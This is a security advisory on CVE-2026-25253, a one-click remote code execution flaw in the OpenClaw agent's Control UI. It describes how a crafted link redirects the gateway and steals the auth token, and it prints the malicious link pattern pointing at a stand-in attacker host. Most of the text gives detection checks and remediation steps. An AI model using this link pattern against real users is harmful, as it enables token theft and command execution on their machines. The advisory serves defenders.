OpenClaw 1-click RCE via WebSocket gateway-URL token theft (CVE-2026-25253, Jan 2026)
TL;DR
CVE-2026-25253 (CVSS 8.8, CWE-669 Incorrect Resource Transfer Between Spheres) — OpenClaw's Control UI blindly trusted the gatewayUrl query-string parameter in browser links. A single malicious link in the victim's browser silently pointed the OpenClaw client at an attacker-controlled WebSocket gateway, which captured the auth token and ran arbitrary commands on the victim's machine with the agent's full system privileges. No authentication, no user interaction beyond a click. Disclosed 2026-01-26; OpenClaw shipped 2026.1.29 the same week with a confirmation modal (full origin-validation later). Distinct from the May 2026 Claw Chain cluster (CVE-2026-44112/-44113/-44115/-44118) — different bug, different month, different researcher — but the same lesson: OpenClaw's open-by-default deployment posture turns every dev box into a network service.
What happened
OpenClaw (formerly Clawdbot/Moltbot) ships a browser-based Control UI that connects to a WebSocket gateway on localhost. The UI's applySettingsFromUrl() function read a gatewayUrl parameter directly from the page URL and applied it without origin-validation, allowlisting, or scheme restrictions (SonicWall, Foresiet, Hive Pro).
A single crafted link of the form http://localhost:<port>/?gatewayUrl=wss://attacker.example/ did three things in sequence:
1. The victim's browser, loading the link, set OpenClaw's gateway to the attacker's WebSocket endpoint.
2. The Control UI then sent its auth token to the attacker's gateway as part of the normal connect handshake.
3. With the token in hand, the attacker spoke the OpenClaw protocol back to the victim's instance and executed arbitrary shell commands with the agent's privileges (SOCRadar, Penligent).
The attack defeats the standard "binds to localhost so it's safe" assumption: the victim's own browser — which trivially reaches localhost — is the network attacker. PoC exploits are public (Hackers Arise, SmartTech247).
Exposure scale at disclosure
By February 2026, scans on Shodan/Censys/ZoomEye saw ~135,000 — 245,000 publicly accessible OpenClaw instances (numbers vary by scanner), the majority unauthenticated (The Hacker News, runZero, Cybersecurity News). Even instances behind a NAT were exploitable via this bug because the attack ran from the victim's browser, not from the network.
Am I affected?
# Check installed OpenClaw version
openclaw --version 2>/dev/null
# Vulnerable: any version < 2026.1.29
# Patched: 2026.1.29 and later
If you ran OpenClaw < 2026.1.29 and ever clicked a link in a browser session that could reach localhost, treat the instance as compromised. Look for unfamiliar gateway URLs or modified auth tokens:
# Common config locations — check for gateway URLs you didn't set
cat ~/.openclaw/config.yaml 2>/dev/null | grep -iE 'gateway|wss?://'
cat ~/.openclaw/settings.json 2>/dev/null | grep -iE 'gateway|wss?://'
# Audit any cron/launchd entries OpenClaw planted
crontab -l 2>/dev/null | grep -iE 'openclaw|claw'
If you are affected
- Upgrade to OpenClaw ≥ 2026.1.29 (also closes the later Claw Chain CVEs when you reach 2026.4.22).
- Regenerate the OpenClaw auth token. The original is compromised even if you can't see specific abuse.
- Rotate every credential the agent had reachable. Per Hive Pro: API keys for messaging platforms (Slack, Discord, Telegram), cloud providers (AWS, GCP, Azure), and any other integrated service.
- Reimage the host if you have any reason to suspect commands were executed — token theft + RCE means persistence may be in place.
- Don't expose OpenClaw to the public internet. The localhost-only assumption was always wrong; treat the Control UI like an admin panel and put it behind SSO or a tunnel.
Prevention
→ prevention/agent-sandboxing.md → prevention/mcp-hygiene.md
Pattern to internalize: any local agent UI that accepts configuration from the URL it was loaded with is one bookmark away from this class of attack. The fix isn't a confirmation modal — it's never reading security-critical config from an attacker-influenced surface. Cross-origin requests against localhost are not blocked by browsers; treat localhost as a public network whenever an attacker can deliver a link.
Sources
- The Hacker News — OpenClaw Bug Enables One-Click Remote Code Execution via Malicious Link
- SonicWall — OpenClaw Auth Token Theft Leading to RCE: CVE-2026-25253
- Hive Pro — One Click to Compromise: Inside OpenClaw's Critical RCE Flaw
- Foresiet — CVE-2026-25253: OpenClaw 1-Click RCE Vulnerability Guide
- SOCRadar — CVE-2026-25253: 1-Click RCE in OpenClaw Through Auth Token Exfiltration
- Penligent — CVE-2026-25253: OpenClaw 1-Click RCE via Malicious Link
- ProArch — OpenClaw RCE Vulnerability (CVE-2026-25253): One-Click Attack & Fix
- runZero — OpenClaw RCE vulnerability: CVE-2026-25253
- Hackers Arise — CVE-2026-25253: How Malicious Links Can Steal Authentication Tokens and Compromise OpenClaw AI Systems
- SmartTech247 — Critical OpenClaw Vulnerability Allows 1-Click Remote Code Execution
- NVD — CVE-2026-25253 detail
- Signal Cage — OpenClaw Security Crisis: 135,000 Exposed Instances and Active Infostealer Campaigns — February 2026